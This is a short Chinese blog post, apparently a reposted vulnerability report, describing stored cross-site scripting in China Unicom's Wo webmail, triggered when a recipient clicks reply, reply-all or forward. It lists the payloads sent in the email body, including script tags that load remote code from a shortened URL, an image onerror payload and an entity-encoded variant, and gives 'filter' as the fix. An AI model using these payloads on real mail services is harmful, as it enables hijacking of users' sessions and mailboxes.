联通wo邮箱存储型XSS – 网站安全 – 自学php

时间: 2020-10-10|tag: 49次围观|0 条评论

给邮箱发一封邮件,由于QQ邮箱发到wo邮箱总是投递不成功,内容我直接贴上来吧   

"><script>alert("跨站")</script>

"><script src=http://goo.gl/Hprf82></script>

"></textarea><script src=http://goo.gl/Hprf82></script>

"><IMG SRC=1 onerror=alert(/XSS/)>

&#34;&#62;&#60;&#115;&#99;&#114;&#105;&#112;&#116;&#62;&#97;&#108;&#101;&#114;&#116;&#40;&#34;&#36328;&#31449;&#34;&#41;&#60;&#47;&#115;&#99;&#114;&#105;&#112;&#116;&#62;

联通wo邮箱存储型XSS – 网站安全 – 自学php插图   收到邮件后,点击上面的"回复、回复全部、转发"任意一个就能触发XSS     联通wo邮箱存储型XSS – 网站安全 – 自学php插图1
联通wo邮箱存储型XSS – 网站安全 – 自学php插图2
修复方案: 过滤

    上一篇: Informix数据库SQL注入实战 - 网站安全 - 自学php

    下一篇: 安全狗高权限时的提权方法 - 网站安全 - 自学p
本博客所有文章如无特别注明均为原创。
复制或转载请以超链接形式注明转自起风了,原文地址《联通wo邮箱存储型XSS – 网站安全 – 自学php
   

还没有人抢沙发呢~